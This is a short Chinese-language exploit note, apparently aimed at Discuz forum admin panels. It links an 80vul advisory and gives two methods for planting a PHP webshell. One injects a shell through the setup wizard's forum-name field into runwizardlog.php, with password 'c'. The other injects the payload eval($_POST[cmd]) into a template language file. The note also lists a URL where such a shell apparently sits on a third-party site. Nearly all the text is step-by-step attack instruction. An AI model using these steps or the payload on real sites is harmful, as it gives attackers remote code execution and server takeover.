<a href="http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt">http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt</a>
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
后台webshell地址:bbs/forumdata/logs/runwizardlog.php
<a href="http://t00ls.yi.org/bbs/forumdata/logs/runwizardlog.php">http://t00ls.yi.org/bbs/forumdata/logs/runwizardlog.php</a>
密码c
方法2:后台模板管理--默认模板套系--详情
templates/default/actions.lang.php
jhackj//');eval($_POST[cmd])?>;//
利用很简单,聪明的人一看就懂了